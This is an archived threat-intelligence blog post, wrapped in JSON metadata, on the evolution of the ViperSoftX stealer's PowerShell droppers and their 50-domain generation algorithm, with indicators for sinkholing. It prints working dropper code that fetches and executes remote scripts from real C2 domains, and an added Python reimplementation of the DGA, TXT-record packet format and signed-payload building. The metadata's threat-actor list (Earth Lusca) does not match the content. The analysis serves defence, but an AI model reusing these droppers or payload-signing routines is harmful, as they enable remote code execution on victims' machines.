{
	"id": "39011c09-00ed-4a86-990e-e38c233bf854",
	"created_at": "2026-04-06T00:08:41.58758Z",
	"updated_at": "2026-04-10T03:36:47.921974Z",
	"deleted_at": null,
	"sha1_hash": "ddd9157389a8865cf5dbd512cd5bf8263c69459c",
	"title": "50 Domains Worth Blocking: The Evolution of ViperSoftX's Underreported DGA | tweedge's blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 116956,
	"plain_text": "50 Domains Worth Blocking: The Evolution of ViperSoftX's Underreported DGA | tweedge's blog\r\nPublished: 2022-12-14 · Archived: 2026-04-05 19:52:05 UTC\r\nRecently, Avast released a detailed report tying together information about ViperSoftX and prior research from several other researchers. ViperSoftX is a multi-stage cryptocurrency stealer which is spread within torrents and filesharing sites - typically distributed as a malicious crack for popular software - and has siphoned off hundreds of thousands of dollars in cryptocurrency from its victims.\r\nOne bit of code caught my eye in Avast’s report under the “Hidden Script Variants” section - this simple PowerShell dropper that downloads \u0026 executes ViperSoftX payloads from a central server:\r\nwhile ($true) {\r\n try {\r\n $r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/3f6ef4a8-13dc-425f-bf60-1964e1d1da02?v=MIG2'\r\n if($r -ne '') {\r\n Start-Job ([ScriptBlock]::Create($r)) | Wait-Job\r\n }\r\n } catch {}\r\n Start-Sleep 2\r\n}\r\nI’ve seen that before.\r\nAfter diving deeper into some old notes, I reconstructed what I believe is an accurate history showing the development of new versions of this dropper, which now uses a domain generation algorithm (DGA) to maintain control over target machines without depending on a single domain (and thus a single point of failure). This DGA generates up to 50 domains, of which only 1 was previously attributed to ViperSoftX by Avast (or any other report that I can find).\r\nIf you want to skip ahead, jump to the New IOCs section now where you can get the list of all malicious domains to sinkhole.\r\nFor the rest, let’s dive into the evolution of ViperSoftX’s stealthiest dropper!1\r\nQuick History of ViperSoftX/VenomSoftX\r\n2020\r\nViperSoftX was first publicly identified in February 2020 by c3rb3ru5d3d53c as a variant of vjw0rm.
The author used PowerShell to copy a persistent backdoor that would run on startup, executing the JavaScript components where the operator could run commands, download new payloads, or uninstall the malware. ViperSoftX’s main goal was to check the clipboard for cryptocurrency addresses (initially only Bitcoin and Ethereum), then replace them with attacker-controlled cryptocurrency addresses.\r\nSimilar findings were reported by FortiGuard Labs several days later, who also dug into the cryptocurrency addresses they observed from ViperSoftX and noted that the operator had amassed $32k USD (in various cryptocurrencies) since 2019 in their known cryptocurrency wallets.\r\n2021\r\nIn April 2021, John Hammond dug into a newer sample that had stolen over $2m in cryptocurrency (at the time), showing how successful the operator had become and clearly demonstrating that they’d scaled their operation well.\r\nOne month later, in May 2021, Colin Cowie reviewed an even newer version of ViperSoftX, which had several notable changes:\r\n- While retaining much of the functionality of prior ViperSoftX samples, much of the JavaScript had been rewritten in PowerShell (e.g. the C2 functionality),\r\n- This version started looking for specific cryptocurrency browser extensions in Chromium-based browsers, and\r\n- This version began using a malicious browser extension to do its cryptocurrency-stealing dirty work.2\r\nWhile pivoting off the unique technique ViperSoftX used to identify whether MetaMask is installed in Firefox, Colin found additional samples that used a new domain, wmail-service.com.
This new domain would be the start of a new and unexpected direction.\r\nEvolution of the Hidden Script Dropper\r\nThroughout this section: big thanks to an anonymous benefactor for pulling samples from VirusTotal for me so I could review and be pretty sure I wasn’t talking out of my ass!\r\nUp until this point, ViperSoftX had been using a moderately sized initial payload - roughly 15KB, with all core functionality built in. In June 2022, the first samples emerged which use a tiny dropper instead. The operator uses it for stealth: it heavily limits what code is deployed to a victim machine, which makes it harder for researchers to see the full picture of this activity.\r\nJune 15th, 2022\r\nDropper: Load from file at offset, then base64\r\nC2: One known domain, wmail-service.com, uses HTTP\r\nPayload: Not witnessed\r\nOn June 15th, 2022, a topic on malwareremoval.com was started by a person who found a task running on startup:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NonInteractive -WindowStyle Hidden -ExecutionPolic\r\nThis loads, base64-decodes, and then executes data stored in a fake driver file. The victim extracted it and found this PowerShell script:\r\nwhile ($true) {\r\n try {\r\n $r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Co\r\n if($r -ne '')\r\n {\r\n Start-Job ([ScriptBlock]::Create($r)) | Wait-Job\r\n }\r\n }\r\n catch {}\r\n Start-Sleep 2\r\n}\r\nThis is identical to the behavior that Avast would attribute to ViperSoftX’s hidden script dropper in 2022, and it also uses the domain name that Colin identified in 2021. Unfortunately the victim did not record the next-stage payload.\r\nJune 22nd, 2022\r\nDropper: Not witnessed\r\nC2: Changed! 
One known domain, wmail-endpoint.com, uses HTTP\r\nPayload: Similar to known ViperSoftX samples\r\n(Un)coincidentally, only a couple of days later on June 22nd, Xavier Mertens published a SANS ISC diary about a peculiar PowerShell script which would:\r\n- Steal information about cryptocurrency browser extensions,\r\n- Monitor the clipboard of the infected computer (but this was commented out), and\r\n- Communicate to C2 using a similar but not identical domain, wmail-endpoint.com\r\nThis is very similar to the behavior that Colin documented. However, since neither the dropper nor the VenomSoftX extension were found at the time (that is to say, this appears to have been a standalone upload to VirusTotal that Xavier found), this report wasn’t attributed to ViperSoftX at the time.\r\nJune 28th - July 7th, 2022\r\nDropper: Load from file at offset, then base64\r\nC2: Changed! First implementation of the DGA, uses HTTP\r\nPayload: Similar to known ViperSoftX samples, near-identical to Xavier Mertens’ discovered payload\r\nA “full” chain showing the new dropper, C2, and payload together would become public roughly two weeks after Xavier’s post, in a thread on whirlpool.net.au where a user found a scheduled task doing ViperSoftX’s usual file slicing:\r\ncmd.exe /c echo iex \"`$b=[IO.File]::ReadAllBytes('C:\\WINDOWS\\System32\\5fcxiwjk.cqe');`$s=[Text.Encoding]::UTF8\r\nbut discovered a simple DGA instead of the single domain that ViperSoftX would typically rely on:\r\nwhile ($true) {\r\n try {\r\n foreach ($c in (@(\"com\", \"xyz\"))) {\r\n foreach ($a in (@(\"wmail\", \"fairu\", \"bideo\", \"privatproxy\", \"ahoravideo\"))) {\r\n foreach ($b in (@(\"endpoint\", \"blog\", \"chat\", \"cdn\", \"schnellvpn\"))) {\r\n try {\r\n $h = \"$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).co\r\n $r = Invoke-RestMethod -Uri 
\"http://$a-$b.$c/v2/20827351-787f-4d3a-871a-7a5060767d38?v=Ver_2\" -Timeo\r\n if ($r -ne '') {\r\n Start-Job ([ScriptBlock]::Create($r)) | Wait-Job -Timeout 7200\r\n break;\r\n }\r\n }\r\n catch {\r\n }\r\n }\r\n }\r\n }\r\n }\r\n catch {\r\n }\r\n Start-Sleep -Seconds 5;\r\n}\r\nIn short, this constructs up to 50 different domains, attempting to request data from each and execute the response sequentially. (Note that the break only leaves the innermost loop, so after a successful fetch the dropper keeps working through the remaining prefixes rather than stopping.) It uses predefined lists to construct each domain:\r\n- Before the dash: wmail, fairu, bideo, privatproxy, ahoravideo\r\n- After the dash: endpoint, blog, chat, cdn, schnellvpn\r\n- TLD: com or xyz\r\nSo example domains that would be possible to generate are wmail-endpoint.com, bideo-cdn.com, fairu-blog.xyz, etc. Even though this is a fixed list and somewhat simple as far as DGAs go, it still allows the operator to change infrastructure or suffer the loss of many domains without losing control over their malware. Because the list is fixed, it is also fully enumerable in advance: all 50 candidates can be blocklisted or sinkholed before the operator ever registers them. Avast’s report noted that one3 of these domains was a ViperSoftX C2 domain - wmail-blog.com - likely because it was hardcoded in a payload they uploaded to VirusTotal.4\r\nOther users on the Whirlpool forums accessed wmail-endpoint.com and received a PowerShell script (VirusTotal) which was nearly identical to the one Xavier Mertens observed two weeks before.\r\nAugust 11th, 2022\r\nAs an aside, the Whirlpool discussion would also be reported on by Pluribus One on their blog in a post on August 11th, where they reported that they had seen anomalous activity from many of the domains in ViperSoftX’s new DGA since June 16th, which is likely closer to when the operator started testing out this new version of their dropper’s C2.\r\nThis is the article that would make me aware of this particular version of the dropper, but neither Pluribus One nor I at the time attributed this activity to ViperSoftX.\r\nSeptember 30th, 2022\r\nDropper: Changed! 
Load from registry, then base64\r\nC2: Changed! Uses the same DGA, but now queries for DNS TXT records and validates that payloads are signed by an attacker-controlled key\r\nPayload: Claimed to be identical\r\nThe final distinct evolution of ViperSoftX’s hidden dropper that I’ve observed removed its dependency on slicing files, opting to store the entire dropper script in the Windows registry:\r\n$pJlksNzfFlG=[ScriptBlock];$jGzeUphieqP=[string];$BdtrkcFYlEfOmf=[char]; icm ($pJlksNzfFlG::Create($jGzeUphieqP\r\nThe dropper itself also changed:\r\n$ms = [IO.MemoryStream]::new();\r\nfunction Get-Updates {\r\n param (\r\n $hostname\r\n )\r\n try {\r\n $dns = Resolve-DnsName -Name $hostname -Type 'TXT'\r\n $ms.SetLength(0);\r\n $ms.Position = 0;\r\n foreach ($txt in $dns) {\r\n try {\r\n if ($txt.Type -ne 'TXT') {\r\n continue;\r\n }\r\n $pkt = [string]::Join('', $txt.Strings);\r\n if ($pkt[0] -eq '.') {\r\n $dp = [System.Convert]::FromBase64String($pkt.Substring(1).Replace('_', '+'));\r\n $ms.Position = [BitConverter]::ToUInt32($dp, 0);\r\n $ms.Write($dp, 4, $dp.Length - 4);\r\n }\r\n }\r\n catch {\r\n }\r\n }\r\n if ($ms.Length -gt 136) {\r\n $ms.Position = 0;\r\n $sig = [byte[]]::new(128);\r\n $timestamp = [byte[]]::new(8);\r\n $buffer = [byte[]]::new($ms.Length - 136);\r\n $ms.Read($sig, 0, 128) | Out-Null;\r\n $ms.Read($timestamp, 0, 8) | Out-Null;\r\n $ms.Read($buffer, 0, $buffer.Length) | Out-Null;\r\n $pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();\r\n [byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,1\r\n $pubkey.ImportCspBlob($bytarr);\r\n if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {\r\n return @{\r\n timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));\r\n text = ([Text.Encoding]::UTF8.GetString($buffer));\r\n };\r\n }\r\n }\r\n }\r\n catch 
{\r\n }\r\n return $null;\r\n}\r\nwhile ($true) {\r\n try {\r\n $update = @{\r\n timestamp = 0;\r\n text = '';\r\n };\r\n foreach ($c in (@(\"com\", \"xyz\"))) {\r\n foreach ($a in (@(\"wmail\", \"fairu\", \"bideo\", \"privatproxy\", \"ahoravideo\"))) {\r\n foreach ($b in (@(\"endpoint\", \"blog\", \"chat\", \"cdn\", \"schnellvpn\"))) {\r\n try {\r\n $h = \"$a-$b.$c\";\r\n $r = Get-Updates $h\r\n if ($null -ne $r) {\r\n if ($r.timestamp -gt $update.timestamp) {\r\n $update = $r;\r\n }\r\n }\r\n }\r\n catch {\r\n }\r\n }\r\n }\r\n }\r\n if ($update.text) {\r\n $job = Start-Job -ScriptBlock ([scriptblock]::Create($update.text));\r\n $job | Wait-Job -Timeout 14400;\r\n $job | Stop-Job;\r\n }\r\n }\r\n catch {\r\n }\r\n Start-Sleep -Seconds 30;\r\n}\r\nWhile it’s much bulkier overall, the changes themselves are straightforward:\r\n- Instead of accepting arbitrary input, the dropper now verifies that each payload it receives is signed by a particular RSA keypair: a 1024-bit public key is hardcoded in the dropper as a CSP key blob and checked with RSACryptoServiceProvider.VerifyData (e.g. to guard against rogue persons taking over the operator’s domains). The flip side for defenders is that registering or sinkholing the DGA domains lets you observe the beacons, but not hand infected machines a payload of your own.\r\n- The operator now queries DNS for TXT records for each domain in the DGA. Every record that starts with a '.' is base64-decoded (with '_' standing in for '+'), and its first four bytes are a little-endian offset at which the rest of the record is written into a buffer, so records can be returned in any order. Once the buffer is longer than 136 bytes it is split into a 128-byte signature, an 8-byte timestamp and the script itself, and across all 50 domains the dropper runs only the validly signed script with the highest timestamp, waiting up to four hours for it before the next 30-second sleep and sweep. HTTP is no longer used (by the dropper specifically) to fetch the next payload.\r\nFunctionally identical versions have been seen since on Reddit, on r/techsupport and r/cybersecurity_help, through until December, so it seems like the operator may have settled in for now and isn’t making new changes to this particular dropper variant.\r\nFuture Work\r\nBut for defenders, there’s much to do. 
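Both mechanisms described in this section, the fixed word lists of the DGA from the June dropper and the TXT-record packet format with its signature check from the September dropper, are small enough for a defender to reproduce, and doing so is the quickest way to get a complete blocklist and to check what a sinkholed or suspicious domain is actually serving. The Python below is an added example written for this page; it is not code from the original post, from the malware, or from any of the cited researchers. The RSA key (generated from a fixed seed), the script text and the per-record chunk size are constructed for the example. The packet layout is taken from the dropper code above: each TXT record is a dot followed by base64 in which '_' replaces '+', the first four decoded bytes are a little-endian offset into a reassembly buffer, and the reassembled data is a 128-byte PKCS#1 v1.5 signature over the script, an 8-byte little-endian timestamp and the script bytes. The CSP PUBLICKEYBLOB parser reads the same layout as the 6,2,0,0,0,164,0,0,82,83,65,49,... byte array the dropper passes to ImportCspBlob.

```python
import base64
import hashlib
import random
import struct
from itertools import product

# 1. The fixed-list DGA: the same three word lists and loop order as the dropper (2 * 5 * 5 = 50).
PREFIXES = ['wmail', 'fairu', 'bideo', 'privatproxy', 'ahoravideo']
SUFFIXES = ['endpoint', 'blog', 'chat', 'cdn', 'schnellvpn']
TLDS = ['com', 'xyz']

def dga_domains():
    # Outermost loop is the TLD, then the prefix, then the suffix, exactly as in the dropper.
    return [f'{a}-{b}.{c}' for c, a, b in product(TLDS, PREFIXES, SUFFIXES)]

# 2. TXT record packets: '.' + base64(uint32 LE offset || chunk), with '+' written as '_'.
def encode_txt_records(blob, chunk_size=180):
    records = []
    for off in range(0, len(blob), chunk_size):
        pkt = struct.pack('<I', off) + blob[off:off + chunk_size]
        records.append('.' + base64.b64encode(pkt).decode().replace('+', '_'))
    return records

def reassemble_txt_records(records):
    # Mirrors the dropper's MemoryStream: seek to each record's offset and write its chunk,
    # so records may arrive in any order; malformed records are skipped, as its try/catch does.
    buf = bytearray()
    for rec in records:
        try:
            if rec[:1] != '.':
                continue
            dp = base64.b64decode(rec[1:].replace('_', '+'))
            off, chunk = struct.unpack_from('<I', dp)[0], dp[4:]
        except (ValueError, struct.error):
            continue
        buf.extend(bytes(max(0, off + len(chunk) - len(buf))))   # grow (zero-filled) if needed
        buf[off:off + len(chunk)] = chunk
    return bytes(buf)

# 3. Minimal RSA with PKCS#1 v1.5 / SHA-256, the scheme RSACryptoServiceProvider.VerifyData checks.
def _is_probable_prime(n, rng, rounds=32):
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):                      # Miller-Rabin
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def rsa_keygen(bits=1024, seed=2022):
    # Fixed seed so the example is reproducible; a real key needs a CSPRNG, not random.Random.
    rng, e = random.Random(seed), 65537
    def prime():
        while True:
            c = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if _is_probable_prime(c, rng):
                return c
    while True:
        p, q = prime(), prime()
        n, phi = p * q, (p - 1) * (q - 1)
        if phi % e:                              # e is prime, so this is gcd(e, phi) == 1
            return n, e, pow(e, -1, phi)

_SHA256_DIGESTINFO = bytes.fromhex('3031300d060960864801650304020105000420')
def _emsa_pkcs1_v15(data, k):
    t = _SHA256_DIGESTINFO + hashlib.sha256(data).digest()
    return bytes([0, 1]) + bytes([255]) * (k - len(t) - 3) + bytes([0]) + t
def rsa_sign(data, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_emsa_pkcs1_v15(data, k), 'big'), d, n).to_bytes(k, 'big')
def rsa_verify(data, sig, n, e):
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, 'big'), e, n).to_bytes(k, 'big') if len(sig) == k else b''
    return em == _emsa_pkcs1_v15(data, k)

# 4. CSP PUBLICKEYBLOB as fed to ImportCspBlob: BLOBHEADER, 'RSA1', bit length, exponent, modulus LE.
def parse_csp_public_blob(blob):
    btype, _version, _reserved, _alg_id = struct.unpack_from('<BBHI', blob, 0)
    magic, bitlen, e = struct.unpack_from('<4sII', blob, 8)
    if btype != 6 or magic != b'RSA1':
        raise ValueError('not an RSA PUBLICKEYBLOB')
    return int.from_bytes(blob[20:20 + bitlen // 8], 'little'), e

# 5. The signed update: 128-byte signature || uint64 LE timestamp || script bytes.
def build_update(script, timestamp, n, d):
    payload = script.encode()
    return rsa_sign(payload, n, d) + struct.pack('<Q', timestamp) + payload
def parse_update(blob, n, e):
    # Same two checks as the dropper: more than 136 bytes, and a valid signature over the script.
    if len(blob) <= 136 or not rsa_verify(blob[136:], blob[:128], n, e):
        return None
    return {'timestamp': struct.unpack_from('<Q', blob, 128)[0], 'text': blob[136:].decode()}
def pick_update(txt_by_domain, n, e):
    # Walk the DGA in dropper order and keep the valid update with the highest timestamp.
    best = {'timestamp': 0, 'text': ''}
    for domain in dga_domains():
        upd = parse_update(reassemble_txt_records(txt_by_domain.get(domain, [])), n, e)
        if upd and upd['timestamp'] > best['timestamp']:
            best = upd
    return best
```

To turn this on a real sample, feed parse_csp_public_blob the full byte array from the dropper to recover the operator's modulus, collect the TXT records each DGA domain returns, and run pick_update over them: a payload that verifies came from the operator, while one that does not came from whoever else currently holds that domain. dga_domains() produces the same 50 names that the New IOCs section asks you to sinkhole.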
I hope that by raising awareness of this ongoing threat to tens or hundreds of thousands of people worldwide, contemporary antimalware providers will begin to detect and remove ViperSoftX from computers worldwide.\r\nAs it stands today, only 2/61 vendors flagged the most recent ViperSoftX dropper sample from September as malicious (VT). For the ViperSoftX dropper from July, that only increases to 12/61 (VT). Given that these programs can execute arbitrary input so long as it’s signed by the malware author, even if VenomSoftX becomes the most sinkholed software on earth, too many people are still at risk.\r\nHow many people exactly? Avast estimated that hotspot countries are India, the USA, and Italy, with under 10,000 active infections each. I think that’s conservative. At this time, I own 18/50 domains in ViperSoftX’s DGA (just for monitoring) - and within the past 30 days, my monitoring infrastructure has served over 900,000 HTTP requests and over 3 billion DNS queries, not including caching by public DNS resolvers. Many of the DGA domains I own rank in the top 20,000 domains globally, according to Cloudflare Radar - a horrifying statistic.\r\nI’ll be working on releasing more information about what I’m seeing over the coming months, as well as working with impacted users to try to find and report more of the accounts responsible for distributing so many infected torrents. 
If you or anyone you know has had a ViperSoftX infection, feel free to send me an anonymous tip via my contact page with links to any torrented software you’ve downloaded that you feel could be suspect.5\r\nNew IOCs\r\nDomains\r\nBelow are two lists of domains referenced by ViperSoftX’s dropper that you (and your security vendor, etc.) should filter on your network:\r\n- 50 domains in the DGA (includes malicious and benign domains)\r\n- 32 domains that aren’t owned by me\r\nFor those who skipped here, hi, sorry, I own 18 of the 50 domains in the ViperSoftX DGA.\r\nI do ask, please only send abuse reports for domains you can confirm malicious activity from - for example, in case other researchers also had the idea to register some domains in ViperSoftX’s DGA.\r\nHowever, in my opinion, please sinkhole all 50 domains, including domains I own. This is for several reasons:\r\n- None of these domains used to exist or host anything else; they’re disposable domains for a reason.\r\n- The nature of this malware campaign - a dropper distributed by torrents and filesharing sites - means that new infections could be cropping up for months or years, given the popularity and longevity of torrents.\r\n- I cannot promise that I can hold all 18 domains in the ViperSoftX DGA forever - for example, I may die, allowing those domains to go on to the open market and be picked up by an unscrupulous actor (or the original malware operator, etc.).\r\n- My goal is to help raze this version of the ViperSoftX DGA to the ground. I am not Microsoft or Google. I’m no security vendor. I can’t stop ViperSoftX - but I can help try to force the ViperSoftX operator to switch infrastructure/tactics. I’ll know if that’s working by how much traffic my domains in the DGA see - or how much it drops.\r\nDomain Safety Matrices\r\nFor those who need to quickly look up whether a particular domain is owned by me or someone else, here are two tables you can use to look that up. 
.com domains are in the first table, then .xyz .\r\n[Domain safety matrices (.com table, then .xyz table) not reproduced here]\r\nVT Links\r\nSample 1 - Example dropper with DGA, using HTTP as the communication channel.\r\nSample 2 - Example dropper with DGA, using DNS as the communication channel.\r\n(Note: it’s late, I’ll expand this later.)\r\nAppendix\r\nSource: https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga"
	],
	"report_names": [
		"evolution-of-vipersoftx-dga"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434121,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ddd9157389a8865cf5dbd512cd5bf8263c69459c.pdf",
		"text": "https://archive.orkl.eu/ddd9157389a8865cf5dbd512cd5bf8263c69459c.txt",
		"img": "https://archive.orkl.eu/ddd9157389a8865cf5dbd512cd5bf8263c69459c.jpg"
	}
}